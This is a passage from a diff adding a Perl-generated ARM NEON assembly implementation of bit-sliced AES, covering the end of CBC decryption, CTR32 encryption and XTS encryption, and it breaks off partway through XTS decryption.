+	bne		.Lcbc_dec_bzero
+#endif
+
+	mov	sp, $fp
+	add	sp, #0x10			@ add sp,$fp,#0x10 is no good for thumb
+	vst1.8	{@XMM[15]}, [$ivp]		@ return IV
+	VFP_ABI_POP
+	ldmia	sp!, {r4-r10, pc}
+.size	bsaes_cbc_encrypt,.-bsaes_cbc_encrypt
+___
+}
+{
+my ($inp,$out,$len,$key, $ctr,$fp,$rounds)=(map("r$_",(0..3,8..10)));
+my $const = "r6";	# shared with _bsaes_encrypt8_alt
+my $keysched = "sp";
+
+$code.=<<___;
+.extern	AES_encrypt
+.global	bsaes_ctr32_encrypt_blocks
+.type	bsaes_ctr32_encrypt_blocks,%function
+.align	5
+bsaes_ctr32_encrypt_blocks:
+	cmp	$len, #8			@ use plain AES for
+	blo	.Lctr_enc_short			@ small sizes
+
+	mov	ip, sp
+	stmdb	sp!, {r4-r10, lr}
+	VFP_ABI_PUSH
+	ldr	$ctr, [ip]			@ ctr is 1st arg on the stack
+	sub	sp, sp, #0x10			@ scratch space to carry over the ctr
+	mov	$fp, sp				@ save sp
+
+	ldr	$rounds, [$key, #240]		@ get # of rounds
+#ifndef	BSAES_ASM_EXTENDED_KEY
+	@ allocate the key schedule on the stack
+	sub	r12, sp, $rounds, lsl#7		@ 128 bytes per inner round key
+	add	r12, #`128-32`			@ size of bit-sliced key schedule
+
+	@ populate the key schedule
+	mov	r4, $key			@ pass key
+	mov	r5, $rounds			@ pass # of rounds
+	mov	sp, r12				@ sp is $keysched
+	bl	_bsaes_key_convert
+	veor	@XMM[7],@XMM[7],@XMM[15]	@ fix up last round key
+	vstmia	r12, {@XMM[7]}			@ save last round key
+
+	vld1.8	{@XMM[0]}, [$ctr]		@ load counter
+	add	$ctr, $const, #.LREVM0SR-.LM0	@ borrow $ctr
+	vldmia	$keysched, {@XMM[4]}		@ load round0 key
+#else
+	ldr	r12, [$key, #244]
+	eors	r12, #1
+	beq	0f
+
+	@ populate the key schedule
+	str	r12, [$key, #244]
+	mov	r4, $key			@ pass key
+	mov	r5, $rounds			@ pass # of rounds
+	add	r12, $key, #248			@ pass key schedule
+	bl	_bsaes_key_convert
+	veor	@XMM[7],@XMM[7],@XMM[15]	@ fix up last round key
+	vstmia	r12, {@XMM[7]}			@ save last round key
+
+.align	2
+0:	add	r12, $key, #248
+	vld1.8	{@XMM[0]}, [$ctr]		@ load counter
+	adrl	$ctr, .LREVM0SR			@ borrow $ctr
+	vldmia	r12, {@XMM[4]}			@ load round0 key
+	sub	sp, #0x10			@ place for adjusted round0 key
+#endif
+
+	vmov.i32	@XMM[8],#1		@ compose 1<<96
+	veor		@XMM[9],@XMM[9],@XMM[9]
+	vrev32.8	@XMM[0],@XMM[0]
+	vext.8		@XMM[8],@XMM[9],@XMM[8],#4
+	vrev32.8	@XMM[4],@XMM[4]
+	vadd.u32	@XMM[9],@XMM[8],@XMM[8]	@ compose 2<<96
+	vstmia	$keysched, {@XMM[4]}		@ save adjusted round0 key
+	b	.Lctr_enc_loop
+
+.align	4
+.Lctr_enc_loop:
+	vadd.u32	@XMM[10], @XMM[8], @XMM[9]	@ compose 3<<96
+	vadd.u32	@XMM[1], @XMM[0], @XMM[8]	@ +1
+	vadd.u32	@XMM[2], @XMM[0], @XMM[9]	@ +2
+	vadd.u32	@XMM[3], @XMM[0], @XMM[10]	@ +3
+	vadd.u32	@XMM[4], @XMM[1], @XMM[10]
+	vadd.u32	@XMM[5], @XMM[2], @XMM[10]
+	vadd.u32	@XMM[6], @XMM[3], @XMM[10]
+	vadd.u32	@XMM[7], @XMM[4], @XMM[10]
+	vadd.u32	@XMM[10], @XMM[5], @XMM[10]	@ next counter
+
+	@ Borrow prologue from _bsaes_encrypt8 to use the opportunity
+	@ to flip byte order in 32-bit counter
+
+	vldmia		$keysched, {@XMM[9]}		@ load round0 key
+#ifndef	BSAES_ASM_EXTENDED_KEY
+	add		r4, $keysched, #0x10		@ pass next round key
+#else
+	add		r4, $key, #`248+16`
+#endif
+	vldmia		$ctr, {@XMM[8]}			@ .LREVM0SR
+	mov		r5, $rounds			@ pass rounds
+	vstmia		$fp, {@XMM[10]}			@ save next counter
+	sub		$const, $ctr, #.LREVM0SR-.LSR	@ pass constants
+
+	bl		_bsaes_encrypt8_alt
+
+	subs		$len, $len, #8
+	blo		.Lctr_enc_loop_done
+
+	vld1.8		{@XMM[8]-@XMM[9]}, [$inp]!	@ load input
+	vld1.8		{@XMM[10]-@XMM[11]}, [$inp]!
+	veor		@XMM[0], @XMM[8]
+	veor		@XMM[1], @XMM[9]
+	vld1.8		{@XMM[12]-@XMM[13]}, [$inp]!
+	veor		@XMM[4], @XMM[10]
+	veor		@XMM[6], @XMM[11]
+	vld1.8		{@XMM[14]-@XMM[15]}, [$inp]!
+	veor		@XMM[3], @XMM[12]
+	vst1.8		{@XMM[0]-@XMM[1]}, [$out]!	@ write output
+	veor		@XMM[7], @XMM[13]
+	veor		@XMM[2], @XMM[14]
+	vst1.8		{@XMM[4]}, [$out]!
+	veor		@XMM[5], @XMM[15]
+	vst1.8		{@XMM[6]}, [$out]!
+	vmov.i32	@XMM[8], #1			@ compose 1<<96
+	vst1.8		{@XMM[3]}, [$out]!
+	veor		@XMM[9], @XMM[9], @XMM[9]
+	vst1.8		{@XMM[7]}, [$out]!
+	vext.8		@XMM[8], @XMM[9], @XMM[8], #4
+	vst1.8		{@XMM[2]}, [$out]!
+	vadd.u32	@XMM[9],@XMM[8],@XMM[8]		@ compose 2<<96
+	vst1.8		{@XMM[5]}, [$out]!
+	vldmia		$fp, {@XMM[0]}			@ load counter
+
+	bne		.Lctr_enc_loop
+	b		.Lctr_enc_done
+
+.align	4
+.Lctr_enc_loop_done:
+	add		$len, $len, #8
+	vld1.8		{@XMM[8]}, [$inp]!	@ load input
+	veor		@XMM[0], @XMM[8]
+	vst1.8		{@XMM[0]}, [$out]!	@ write output
+	cmp		$len, #2
+	blo		.Lctr_enc_done
+	vld1.8		{@XMM[9]}, [$inp]!
+	veor		@XMM[1], @XMM[9]
+	vst1.8		{@XMM[1]}, [$out]!
+	beq		.Lctr_enc_done
+	vld1.8		{@XMM[10]}, [$inp]!
+	veor		@XMM[4], @XMM[10]
+	vst1.8		{@XMM[4]}, [$out]!
+	cmp		$len, #4
+	blo		.Lctr_enc_done
+	vld1.8		{@XMM[11]}, [$inp]!
+	veor		@XMM[6], @XMM[11]
+	vst1.8		{@XMM[6]}, [$out]!
+	beq		.Lctr_enc_done
+	vld1.8		{@XMM[12]}, [$inp]!
+	veor		@XMM[3], @XMM[12]
+	vst1.8		{@XMM[3]}, [$out]!
+	cmp		$len, #6
+	blo		.Lctr_enc_done
+	vld1.8		{@XMM[13]}, [$inp]!
+	veor		@XMM[7], @XMM[13]
+	vst1.8		{@XMM[7]}, [$out]!
+	beq		.Lctr_enc_done
+	vld1.8		{@XMM[14]}, [$inp]
+	veor		@XMM[2], @XMM[14]
+	vst1.8		{@XMM[2]}, [$out]!
+
+.Lctr_enc_done:
+	vmov.i32	q0, #0
+	vmov.i32	q1, #0
+#ifndef	BSAES_ASM_EXTENDED_KEY
+.Lctr_enc_bzero:			@ wipe key schedule [if any]
+	vstmia		$keysched!, {q0-q1}
+	cmp		$keysched, $fp
+	bne		.Lctr_enc_bzero
+#else
+	vstmia		$keysched, {q0-q1}
+#endif
+
+	mov	sp, $fp
+	add	sp, #0x10		@ add sp,$fp,#0x10 is no good for thumb
+	VFP_ABI_POP
+	ldmia	sp!, {r4-r10, pc}	@ return
+
+.align	4
+.Lctr_enc_short:
+	ldr	ip, [sp]		@ ctr pointer is passed on stack
+	stmdb	sp!, {r4-r8, lr}
+
+	mov	r4, $inp		@ copy arguments
+	mov	r5, $out
+	mov	r6, $len
+	mov	r7, $key
+	ldr	r8, [ip, #12]		@ load counter LSW
+	vld1.8	{@XMM[1]}, [ip]		@ load whole counter value
+#ifdef __ARMEL__
+	rev	r8, r8
+#endif
+	sub	sp, sp, #0x10
+	vst1.8	{@XMM[1]}, [sp,:64]	@ copy counter value
+	sub	sp, sp, #0x10
+
+.Lctr_enc_short_loop:
+	add	r0, sp, #0x10		@ input counter value
+	mov	r1, sp			@ output on the stack
+	mov	r2, r7			@ key
+
+	bl	AES_encrypt
+
+	vld1.8	{@XMM[0]}, [r4]!	@ load input
+	vld1.8	{@XMM[1]}, [sp,:64]	@ load encrypted counter
+	add	r8, r8, #1
+#ifdef __ARMEL__
+	rev	r0, r8
+	str	r0, [sp, #0x1c]		@ next counter value
+#else
+	str	r8, [sp, #0x1c]		@ next counter value
+#endif
+	veor	@XMM[0],@XMM[0],@XMM[1]
+	vst1.8	{@XMM[0]}, [r5]!	@ store output
+	subs	r6, r6, #1
+	bne	.Lctr_enc_short_loop
+
+	vmov.i32	q0, #0
+	vmov.i32	q1, #0
+	vstmia		sp!, {q0-q1}
+
+	ldmia	sp!, {r4-r8, pc}
+.size	bsaes_ctr32_encrypt_blocks,.-bsaes_ctr32_encrypt_blocks
+___
+}
+{
+######################################################################
+# void bsaes_xts_[en|de]crypt(const char *inp,char *out,size_t len,
+#	const AES_KEY *key1, const AES_KEY *key2,
+#	const unsigned char iv[16]);
+#
+my ($inp,$out,$len,$key,$rounds,$magic,$fp)=(map("r$_",(7..10,1..3)));
+my $const="r6";		# returned by _bsaes_key_convert
+my $twmask=@XMM[5];
+my @T=@XMM[6..7];
+
+$code.=<<___;
+.globl	bsaes_xts_encrypt
+.type	bsaes_xts_encrypt,%function
+.align	4
+bsaes_xts_encrypt:
+	mov	ip, sp
+	stmdb	sp!, {r4-r10, lr}		@ 0x20
+	VFP_ABI_PUSH
+	mov	r6, sp				@ future $fp
+
+	mov	$inp, r0
+	mov	$out, r1
+	mov	$len, r2
+	mov	$key, r3
+
+	sub	r0, sp, #0x10			@ 0x10
+	bic	r0, #0xf			@ align at 16 bytes
+	mov	sp, r0
+
+#ifdef	XTS_CHAIN_TWEAK
+	ldr	r0, [ip]			@ pointer to input tweak
+#else
+	@ generate initial tweak
+	ldr	r0, [ip, #4]			@ iv[]
+	mov	r1, sp
+	ldr	r2, [ip, #0]			@ key2
+	bl	AES_encrypt
+	mov	r0,sp				@ pointer to initial tweak
+#endif
+
+	ldr	$rounds, [$key, #240]		@ get # of rounds
+	mov	$fp, r6
+#ifndef	BSAES_ASM_EXTENDED_KEY
+	@ allocate the key schedule on the stack
+	sub	r12, sp, $rounds, lsl#7		@ 128 bytes per inner round key
+	@ add	r12, #`128-32`			@ size of bit-sliced key schedule
+	sub	r12, #`32+16`			@ place for tweak[9]
+
+	@ populate the key schedule
+	mov	r4, $key			@ pass key
+	mov	r5, $rounds			@ pass # of rounds
+	mov	sp, r12
+	add	r12, #0x90			@ pass key schedule
+	bl	_bsaes_key_convert
+	veor	@XMM[7], @XMM[7], @XMM[15]	@ fix up last round key
+	vstmia	r12, {@XMM[7]}			@ save last round key
+#else
+	ldr	r12, [$key, #244]
+	eors	r12, #1
+	beq	0f
+
+	str	r12, [$key, #244]
+	mov	r4, $key			@ pass key
+	mov	r5, $rounds			@ pass # of rounds
+	add	r12, $key, #248			@ pass key schedule
+	bl	_bsaes_key_convert
+	veor	@XMM[7], @XMM[7], @XMM[15]	@ fix up last round key
+	vstmia	r12, {@XMM[7]}
+
+.align	2
+0:	sub	sp, #0x90			@ place for tweak[9]
+#endif
+
+	vld1.8	{@XMM[8]}, [r0]			@ initial tweak
+	adr	$magic, .Lxts_magic
+
+	subs	$len, #0x80
+	blo	.Lxts_enc_short
+	b	.Lxts_enc_loop
+
+.align	4
+.Lxts_enc_loop:
+	vldmia		$magic, {$twmask}	@ load XTS magic
+	vshr.s64	@T[0], @XMM[8], #63
+	mov		r0, sp
+	vand		@T[0], @T[0], $twmask
+___
+for($i=9;$i<16;$i++) {
+$code.=<<___;
+	vadd.u64	@XMM[$i], @XMM[$i-1], @XMM[$i-1]
+	vst1.64		{@XMM[$i-1]}, [r0,:128]!
+	vswp		`&Dhi("@T[0]")`,`&Dlo("@T[0]")`
+	vshr.s64	@T[1], @XMM[$i], #63
+	veor		@XMM[$i], @XMM[$i], @T[0]
+	vand		@T[1], @T[1], $twmask
+___
+	@T=reverse(@T);
+
+$code.=<<___ if ($i>=10);
+	vld1.8		{@XMM[$i-10]}, [$inp]!
+___
+$code.=<<___ if ($i>=11);
+	veor		@XMM[$i-11], @XMM[$i-11], @XMM[$i-3]
+___
+}
+$code.=<<___;
+	vadd.u64	@XMM[8], @XMM[15], @XMM[15]
+	vst1.64		{@XMM[15]}, [r0,:128]!
+	vswp		`&Dhi("@T[0]")`,`&Dlo("@T[0]")`
+	veor		@XMM[8], @XMM[8], @T[0]
+	vst1.64		{@XMM[8]}, [r0,:128]		@ next round tweak
+
+	vld1.8		{@XMM[6]-@XMM[7]}, [$inp]!
+	veor		@XMM[5], @XMM[5], @XMM[13]
+#ifndef	BSAES_ASM_EXTENDED_KEY
+	add		r4, sp, #0x90			@ pass key schedule
+#else
+	add		r4, $key, #248			@ pass key schedule
+#endif
+	veor		@XMM[6], @XMM[6], @XMM[14]
+	mov		r5, $rounds			@ pass rounds
+	veor		@XMM[7], @XMM[7], @XMM[15]
+	mov		r0, sp
+
+	bl		_bsaes_encrypt8
+
+	vld1.64		{@XMM[ 8]-@XMM[ 9]}, [r0,:128]!
+	vld1.64		{@XMM[10]-@XMM[11]}, [r0,:128]!
+	veor		@XMM[0], @XMM[0], @XMM[ 8]
+	vld1.64		{@XMM[12]-@XMM[13]}, [r0,:128]!
+	veor		@XMM[1], @XMM[1], @XMM[ 9]
+	veor		@XMM[8], @XMM[4], @XMM[10]
+	vst1.8		{@XMM[0]-@XMM[1]}, [$out]!
+	veor		@XMM[9], @XMM[6], @XMM[11]
+	vld1.64		{@XMM[14]-@XMM[15]}, [r0,:128]!
+	veor		@XMM[10], @XMM[3], @XMM[12]
+	vst1.8		{@XMM[8]-@XMM[9]}, [$out]!
+	veor		@XMM[11], @XMM[7], @XMM[13]
+	veor		@XMM[12], @XMM[2], @XMM[14]
+	vst1.8		{@XMM[10]-@XMM[11]}, [$out]!
+	veor		@XMM[13], @XMM[5], @XMM[15]
+	vst1.8		{@XMM[12]-@XMM[13]}, [$out]!
+
+	vld1.64		{@XMM[8]}, [r0,:128]		@ next round tweak
+
+	subs		$len, #0x80
+	bpl		.Lxts_enc_loop
+
+.Lxts_enc_short:
+	adds		$len, #0x70
+	bmi		.Lxts_enc_done
+
+	vldmia		$magic, {$twmask}	@ load XTS magic
+	vshr.s64	@T[0], @XMM[8], #63
+	mov		r0, sp
+	vand		@T[0], @T[0], $twmask
+___
+for($i=9;$i<16;$i++) {
+$code.=<<___;
+	vadd.u64	@XMM[$i], @XMM[$i-1], @XMM[$i-1]
+	vst1.64		{@XMM[$i-1]}, [r0,:128]!
+	vswp		`&Dhi("@T[0]")`,`&Dlo("@T[0]")`
+	vshr.s64	@T[1], @XMM[$i], #63
+	veor		@XMM[$i], @XMM[$i], @T[0]
+	vand		@T[1], @T[1], $twmask
+___
+	@T=reverse(@T);
+
+$code.=<<___ if ($i>=10);
+	vld1.8		{@XMM[$i-10]}, [$inp]!
+	subs		$len, #0x10
+	bmi		.Lxts_enc_`$i-9`
+___
+$code.=<<___ if ($i>=11);
+	veor		@XMM[$i-11], @XMM[$i-11], @XMM[$i-3]
+___
+}
+$code.=<<___;
+	sub		$len, #0x10
+	vst1.64		{@XMM[15]}, [r0,:128]		@ next round tweak
+
+	vld1.8		{@XMM[6]}, [$inp]!
+	veor		@XMM[5], @XMM[5], @XMM[13]
+#ifndef	BSAES_ASM_EXTENDED_KEY
+	add		r4, sp, #0x90			@ pass key schedule
+#else
+	add		r4, $key, #248			@ pass key schedule
+#endif
+	veor		@XMM[6], @XMM[6], @XMM[14]
+	mov		r5, $rounds			@ pass rounds
+	mov		r0, sp
+
+	bl		_bsaes_encrypt8
+
+	vld1.64		{@XMM[ 8]-@XMM[ 9]}, [r0,:128]!
+	vld1.64		{@XMM[10]-@XMM[11]}, [r0,:128]!
+	veor		@XMM[0], @XMM[0], @XMM[ 8]
+	vld1.64		{@XMM[12]-@XMM[13]}, [r0,:128]!
+	veor		@XMM[1], @XMM[1], @XMM[ 9]
+	veor		@XMM[8], @XMM[4], @XMM[10]
+	vst1.8		{@XMM[0]-@XMM[1]}, [$out]!
+	veor		@XMM[9], @XMM[6], @XMM[11]
+	vld1.64		{@XMM[14]}, [r0,:128]!
+	veor		@XMM[10], @XMM[3], @XMM[12]
+	vst1.8		{@XMM[8]-@XMM[9]}, [$out]!
+	veor		@XMM[11], @XMM[7], @XMM[13]
+	veor		@XMM[12], @XMM[2], @XMM[14]
+	vst1.8		{@XMM[10]-@XMM[11]}, [$out]!
+	vst1.8		{@XMM[12]}, [$out]!
+
+	vld1.64		{@XMM[8]}, [r0,:128]		@ next round tweak
+	b		.Lxts_enc_done
+.align	4
+.Lxts_enc_6:
+	vst1.64		{@XMM[14]}, [r0,:128]		@ next round tweak
+
+	veor		@XMM[4], @XMM[4], @XMM[12]
+#ifndef	BSAES_ASM_EXTENDED_KEY
+	add		r4, sp, #0x90			@ pass key schedule
+#else
+	add		r4, $key, #248			@ pass key schedule
+#endif
+	veor		@XMM[5], @XMM[5], @XMM[13]
+	mov		r5, $rounds			@ pass rounds
+	mov		r0, sp
+
+	bl		_bsaes_encrypt8
+
+	vld1.64		{@XMM[ 8]-@XMM[ 9]}, [r0,:128]!
+	vld1.64		{@XMM[10]-@XMM[11]}, [r0,:128]!
+	veor		@XMM[0], @XMM[0], @XMM[ 8]
+	vld1.64		{@XMM[12]-@XMM[13]}, [r0,:128]!
+	veor		@XMM[1], @XMM[1], @XMM[ 9]
+	veor		@XMM[8], @XMM[4], @XMM[10]
+	vst1.8		{@XMM[0]-@XMM[1]}, [$out]!
+	veor		@XMM[9], @XMM[6], @XMM[11]
+	veor		@XMM[10], @XMM[3], @XMM[12]
+	vst1.8		{@XMM[8]-@XMM[9]}, [$out]!
+	veor		@XMM[11], @XMM[7], @XMM[13]
+	vst1.8		{@XMM[10]-@XMM[11]}, [$out]!
+
+	vld1.64		{@XMM[8]}, [r0,:128]		@ next round tweak
+	b		.Lxts_enc_done
+
+@ put this in range for both ARM and Thumb mode adr instructions
+.align	5
+.Lxts_magic:
+	.quad	1, 0x87
+
+.align	5
+.Lxts_enc_5:
+	vst1.64		{@XMM[13]}, [r0,:128]		@ next round tweak
+
+	veor		@XMM[3], @XMM[3], @XMM[11]
+#ifndef	BSAES_ASM_EXTENDED_KEY
+	add		r4, sp, #0x90			@ pass key schedule
+#else
+	add		r4, $key, #248			@ pass key schedule
+#endif
+	veor		@XMM[4], @XMM[4], @XMM[12]
+	mov		r5, $rounds			@ pass rounds
+	mov		r0, sp
+
+	bl		_bsaes_encrypt8
+
+	vld1.64		{@XMM[ 8]-@XMM[ 9]}, [r0,:128]!
+	vld1.64		{@XMM[10]-@XMM[11]}, [r0,:128]!
+	veor		@XMM[0], @XMM[0], @XMM[ 8]
+	vld1.64		{@XMM[12]}, [r0,:128]!
+	veor		@XMM[1], @XMM[1], @XMM[ 9]
+	veor		@XMM[8], @XMM[4], @XMM[10]
+	vst1.8		{@XMM[0]-@XMM[1]}, [$out]!
+	veor		@XMM[9], @XMM[6], @XMM[11]
+	veor		@XMM[10], @XMM[3], @XMM[12]
+	vst1.8		{@XMM[8]-@XMM[9]}, [$out]!
+	vst1.8		{@XMM[10]}, [$out]!
+
+	vld1.64		{@XMM[8]}, [r0,:128]		@ next round tweak
+	b		.Lxts_enc_done
+.align	4
+.Lxts_enc_4:
+	vst1.64		{@XMM[12]}, [r0,:128]		@ next round tweak
+
+	veor		@XMM[2], @XMM[2], @XMM[10]
+#ifndef	BSAES_ASM_EXTENDED_KEY
+	add		r4, sp, #0x90			@ pass key schedule
+#else
+	add		r4, $key, #248			@ pass key schedule
+#endif
+	veor		@XMM[3], @XMM[3], @XMM[11]
+	mov		r5, $rounds			@ pass rounds
+	mov		r0, sp
+
+	bl		_bsaes_encrypt8
+
+	vld1.64		{@XMM[ 8]-@XMM[ 9]}, [r0,:128]!
+	vld1.64		{@XMM[10]-@XMM[11]}, [r0,:128]!
+	veor		@XMM[0], @XMM[0], @XMM[ 8]
+	veor		@XMM[1], @XMM[1], @XMM[ 9]
+	veor		@XMM[8], @XMM[4], @XMM[10]
+	vst1.8		{@XMM[0]-@XMM[1]}, [$out]!
+	veor		@XMM[9], @XMM[6], @XMM[11]
+	vst1.8		{@XMM[8]-@XMM[9]}, [$out]!
+
+	vld1.64		{@XMM[8]}, [r0,:128]		@ next round tweak
+	b		.Lxts_enc_done
+.align	4
+.Lxts_enc_3:
+	vst1.64		{@XMM[11]}, [r0,:128]		@ next round tweak
+
+	veor		@XMM[1], @XMM[1], @XMM[9]
+#ifndef	BSAES_ASM_EXTENDED_KEY
+	add		r4, sp, #0x90			@ pass key schedule
+#else
+	add		r4, $key, #248			@ pass key schedule
+#endif
+	veor		@XMM[2], @XMM[2], @XMM[10]
+	mov		r5, $rounds			@ pass rounds
+	mov		r0, sp
+
+	bl		_bsaes_encrypt8
+
+	vld1.64		{@XMM[8]-@XMM[9]}, [r0,:128]!
+	vld1.64		{@XMM[10]}, [r0,:128]!
+	veor		@XMM[0], @XMM[0], @XMM[ 8]
+	veor		@XMM[1], @XMM[1], @XMM[ 9]
+	veor		@XMM[8], @XMM[4], @XMM[10]
+	vst1.8		{@XMM[0]-@XMM[1]}, [$out]!
+	vst1.8		{@XMM[8]}, [$out]!
+
+	vld1.64		{@XMM[8]}, [r0,:128]		@ next round tweak
+	b		.Lxts_enc_done
+.align	4
+.Lxts_enc_2:
+	vst1.64		{@XMM[10]}, [r0,:128]		@ next round tweak
+
+	veor		@XMM[0], @XMM[0], @XMM[8]
+#ifndef	BSAES_ASM_EXTENDED_KEY
+	add		r4, sp, #0x90			@ pass key schedule
+#else
+	add		r4, $key, #248			@ pass key schedule
+#endif
+	veor		@XMM[1], @XMM[1], @XMM[9]
+	mov		r5, $rounds			@ pass rounds
+	mov		r0, sp
+
+	bl		_bsaes_encrypt8
+
+	vld1.64		{@XMM[8]-@XMM[9]}, [r0,:128]!
+	veor		@XMM[0], @XMM[0], @XMM[ 8]
+	veor		@XMM[1], @XMM[1], @XMM[ 9]
+	vst1.8		{@XMM[0]-@XMM[1]}, [$out]!
+
+	vld1.64		{@XMM[8]}, [r0,:128]		@ next round tweak
+	b		.Lxts_enc_done
+.align	4
+.Lxts_enc_1:
+	mov		r0, sp
+	veor		@XMM[0], @XMM[8]
+	mov		r1, sp
+	vst1.8		{@XMM[0]}, [sp,:128]
+	mov		r2, $key
+	mov		r4, $fp				@ preserve fp
+
+	bl		AES_encrypt
+
+	vld1.8		{@XMM[0]}, [sp,:128]
+	veor		@XMM[0], @XMM[0], @XMM[8]
+	vst1.8		{@XMM[0]}, [$out]!
+	mov		$fp, r4
+
+	vmov		@XMM[8], @XMM[9]		@ next round tweak
+
+.Lxts_enc_done:
+#ifndef	XTS_CHAIN_TWEAK
+	adds		$len, #0x10
+	beq		.Lxts_enc_ret
+	sub		r6, $out, #0x10
+
+.Lxts_enc_steal:
+	ldrb		r0, [$inp], #1
+	ldrb		r1, [$out, #-0x10]
+	strb		r0, [$out, #-0x10]
+	strb		r1, [$out], #1
+
+	subs		$len, #1
+	bhi		.Lxts_enc_steal
+
+	vld1.8		{@XMM[0]}, [r6]
+	mov		r0, sp
+	veor		@XMM[0], @XMM[0], @XMM[8]
+	mov		r1, sp
+	vst1.8		{@XMM[0]}, [sp,:128]
+	mov		r2, $key
+	mov		r4, $fp			@ preserve fp
+
+	bl		AES_encrypt
+
+	vld1.8		{@XMM[0]}, [sp,:128]
+	veor		@XMM[0], @XMM[0], @XMM[8]
+	vst1.8		{@XMM[0]}, [r6]
+	mov		$fp, r4
+#endif
+
+.Lxts_enc_ret:
+	bic		r0, $fp, #0xf
+	vmov.i32	q0, #0
+	vmov.i32	q1, #0
+#ifdef	XTS_CHAIN_TWEAK
+	ldr		r1, [$fp, #0x20+VFP_ABI_FRAME]	@ chain tweak
+#endif
+.Lxts_enc_bzero:				@ wipe key schedule [if any]
+	vstmia		sp!, {q0-q1}
+	cmp		sp, r0
+	bne		.Lxts_enc_bzero
+
+	mov		sp, $fp
+#ifdef	XTS_CHAIN_TWEAK
+	vst1.8		{@XMM[8]}, [r1]
+#endif
+	VFP_ABI_POP
+	ldmia		sp!, {r4-r10, pc}	@ return
+
+.size	bsaes_xts_encrypt,.-bsaes_xts_encrypt
+
+.globl	bsaes_xts_decrypt
+.type	bsaes_xts_decrypt,%function
+.align	4
+bsaes_xts_decrypt:
+	mov	ip, sp
+	stmdb	sp!, {r4-r10, lr}		@ 0x20
+	VFP_ABI_PUSH
+	mov	r6, sp				@ future $fp
+
+	mov	$inp, r0
+	mov	$out, r1
+	mov	$len, r2
+	mov	$key, r3
+
+	sub	r0, sp, #0x10			@ 0x10
+	bic	r0, #0xf			@ align at 16 bytes
+	mov	sp, r0
+
+#ifdef	XTS_CHAIN_TWEAK
+	ldr	r0, [ip]			@ pointer to input tweak
+#else
+	@ generate initial tweak
+	ldr	r0, [ip, #4]			@ iv[]
+	mov	r1, sp
+	ldr	r2, [ip, #0]			@ key2
+	bl	AES_encrypt
+	mov	r0, sp				@ pointer to initial tweak
+#endif
+
+	ldr	$rounds, [$key, #240]		@ get # of rounds
+	mov	$fp, r6
+#ifndef	BSAES_ASM_EXTENDED_KEY
+	@ allocate the key schedule on the stack
+	sub	r12, sp, $rounds, lsl#7		@ 128 bytes per inner round key
+	@ add	r12, #`128-32`			@ size of bit-sliced key schedule
+	sub	r12, #`32+16`			@ place for tweak[9]
+
+	@ populate the key schedule
+	mov	r4, $key			@ pass key
+	mov	r5, $rounds			@ pass # of rounds
+	mov	sp, r12
+	add	r12, #0x90			@ pass key schedule
+	bl	_bsaes_key_convert
+	add	r4, sp, #0x90
+	vldmia	r4, {@XMM[6]}
+	vstmia	r12,  {@XMM[15]}		@ save last round key
+	veor	@XMM[7], @XMM[7], @XMM[6]	@ fix up round 0 key
+	vstmia	r4, {@XMM[7]}
+#else
+	ldr	r12, [$key, #244]
+	eors	r12, #1
+	beq	0f
+
+	str	r12, [$key, #244]
+	mov	r4, $key			@ pass key
+	mov	r5, $rounds			@ pass # of rounds
+	add	r12, $key, #248			@ pass key schedule
+	bl	_bsaes_key_convert
+	add	r4, $key, #248
+	vldmia	r4, {@XMM[6]}
+	vstmia	r12,  {@XMM[15]}		@ save last round key
+	veor	@XMM[7], @XMM[7], @XMM[6]	@ fix up round 0 key
+	vstmia	r4, {@XMM[7]}
+
+.align	2
+0:	sub	sp, #0x90			@ place for tweak[9]
+#endif
+	vld1.8	{@XMM[8]}, [r0]			@ initial tweak
+	adr	$magic, .Lxts_magic
+
+	tst	$len, #0xf			@ if not multiple of 16
+	it	ne				@ Thumb2 thing, sanity check in ARM
+	subne	$len, #0x10			@ subtract another 16 bytes
+	subs	$len, #0x80
+
+	blo	.Lxts_dec_short
+	b	.Lxts_dec_loop
+
+.align	4
+.Lxts_dec_loop:
+	vldmia		$magic, {$twmask}	@ load XTS magic
+	vshr.s64	@T[0], @XMM[8], #63
+	mov		r0, sp
+	vand		@T[0], @T[0], $twmask
+___
+for($i=9;$i<16;$i++) {
+$code.=<<___;
+	vadd.u64	@XMM[$i], @XMM[$i-1], @XMM[$i-1]
+	vst1.64		{@XMM[$i-1]}, [r0,:128]!
+	vswp		`&Dhi("@T[0]")`,`&Dlo("@T[0]")`
+	vshr.s64	@T[1], @XMM[$i], #63
+	veor		@XMM[$i], @XMM[$i], @T[0]
+	vand		@T[1], @T[1], $twmask
+___
+	@T=reverse(@T);
+
+$code.=<<___ if ($i>=10);
+	vld1.8		{@XMM[$i-10]}, [$inp]!
+___
+$code.=<<___ if ($i>=11);
+	veor		@XMM[$i-11], @XMM[$i-11], @XMM[$i-3]
+___
+}
+$code.=<<___;
+	vadd.u64	@XMM[8], @XMM[15], @XMM[15]
+	vst1.64		{@XMM[15]}, [r0,:128]!
+	vswp		`&Dhi("@T[0]")`,`&Dlo("@T[0]")`
+	veor		@XMM[8], @XMM[8], @T[0]
+	vst1.64		{@XMM[8]}, [r0,:128]		@ next round tweak
+
+	vld1.8		{@XMM[6]-@XMM[7]}, [$inp]!
+	veor		@XMM[5], @XMM[5], @XMM[13]
+#ifndef	BSAES_ASM_EXTENDED_KEY
+	add		r4, sp, #0x90			@ pass key schedule
+#else
+	add		r4, $key, #248			@ pass key schedule
+#endif
+	veor		@XMM[6], @XMM[6], @XMM[14]
+	mov		r5, $rounds			@ pass rounds
+	veor		@XMM[7], @XMM[7], @XMM[15]
+	mov		r0, sp
+
+	bl		_bsaes_decrypt8
+
+	vld1.64		{@XMM[ 8]-@XMM[ 9]}, [r0,:128]!
+	vld1.64		{@XMM[10]-@XMM[11]}, [r0,:128]!
+	veor		@XMM[0], @XMM[0], @XMM[ 8]
+	vld1.64		{@XMM[12]-@XMM[13]}, [r0,:128]!
+	veor		@XMM[1], @XMM[1], @XMM[ 9]
+	veor		@XMM[8], @XMM[6], @XMM[10]
+	vst1.8		{@XMM[0]-@XMM[1]}, [$out]!
+	veor		@XMM[9], @XMM[4], @XMM[11]
+	vld1.64		{@XMM[14]-@XMM[15]}, [r0,:128]!
+	veor		@XMM[10], @XMM[2], @XMM[12]
+	vst1.8		{@XMM[8]-@XMM[9]}, [$out]!
+	veor		@XMM[11], @XMM[7], @XMM[13]
+	veor		@XMM[12], @XMM[3], @XMM[14]
+	vst1.8		{@XMM[10]-@XMM[11]}, [$out]!
+	veor		@XMM[13], @XMM[5], @XMM[15]
+	vst1.8		{@XMM[12]-@XMM[13]}, [$out]!
+
